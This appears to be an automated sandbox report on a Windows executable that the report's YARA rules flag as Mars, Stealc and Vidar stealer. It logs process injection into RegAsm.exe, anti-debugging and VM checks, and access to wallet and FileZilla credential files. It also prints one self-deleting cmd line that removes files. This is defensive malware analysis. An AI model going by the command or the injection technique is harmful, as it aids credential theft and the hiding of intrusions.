Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: w7kdnBzGat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: w7kdnBzGat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\p2facz8e\output.pdb& source: w7kdnBzGat.exe
Source:	Binary string: C:\p2facz8e\output.pdb source: w7kdnBzGat.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0041917C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_0041917C

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004C8F70 push ecx; ret	0_2_004C8F83
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004C7E5F push ecx; ret	0_2_004C7E72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004176B5 push ecx; ret	1_2_004176C8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

API coverage: 8.2 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 3032

Thread sleep count: 34 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_0050E877 FindFirstFileExW,		0_2_0050E877
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_0050EC61 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_0050EC61

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00401120 GetSystemInfo,

1_2_00401120

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034961312.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

Code function: 0_2_0050E27B IsDebuggerPresent,

0_2_0050E27B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

1_2_0041917C

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_00505E5D mov eax, dword ptr fs:[00000030h]	0_2_00505E5D
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_00505CF9 mov eax, dword ptr fs:[00000030h]	0_2_00505CF9
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_00505CB6 mov eax, dword ptr fs:[00000030h]	0_2_00505CB6
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004FFD5B mov ecx, dword ptr fs:[00000030h]	0_2_004FFD5B
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_00505D3C mov eax, dword ptr fs:[00000030h]	0_2_00505D3C
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_00505D97 mov eax, dword ptr fs:[00000030h]	0_2_00505D97
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_00505EE5 mov eax, dword ptr fs:[00000030h]	0_2_00505EE5
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_00505EA1 mov eax, dword ptr fs:[00000030h]	0_2_00505EA1
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_00505F16 mov eax, dword ptr fs:[00000030h]	0_2_00505F16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00415DB0 mov eax, dword ptr fs:[00000030h]	1_2_00415DB0

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

Code function: 0_2_005136D3 GetProcessHeap,

0_2_005136D3

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004C8844 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004C8844
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004D6B07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004D6B07
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004C8CC0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004C8CC0
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004C8E50 SetUnhandledExceptionFilter,	0_2_004C8E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00419DB7 SetUnhandledExceptionFilter,	1_2_00419DB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00417B3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004173CD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004173CD

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

Code function: 0_2_00E1018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

0_2_00E1018D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41B000	Jump to behavior
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000	Jump to behavior
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 636000	Jump to behavior
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E15008	Jump to behavior

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

Code function: 0_2_004C863C cpuid

0_2_004C863C

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: GetLocaleInfoEx,FormatMessageA,	0_2_004A624D
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00512ADE
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: EnumSystemLocalesW,	0_2_00504C2D
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: EnumSystemLocalesW,	0_2_00512DE9
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: EnumSystemLocalesW,	0_2_00512D80
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: EnumSystemLocalesW,	0_2_00504D84
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: EnumSystemLocalesW,	0_2_00504DB9
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: EnumSystemLocalesW,	0_2_00504DBE
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: EnumSystemLocalesW,	0_2_00512E84
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00512F0F
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: GetLocaleInfoW,	0_2_00513162
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0051328B
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: GetLocaleInfoEx,	0_2_004C72A6
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: GetLocaleInfoW,	0_2_00513391
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00513460
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: GetLocaleInfoW,	0_2_005056EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	1_2_00414560

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

Code function: 0_2_004C8B95 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004C8B95

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_004143B0 GetUserNameA,

1_2_004143B0

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

Code function: 0_2_0050DB49 GetTimeZoneInformation,

0_2_0050DB49

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 408, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 408, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Command and Scripting Interpreter	1 DLL Side-Loading	411 Process Injection	2 Virtualization/Sandbox Evasion	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	411 Process Injection	LSASS Memory	41 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
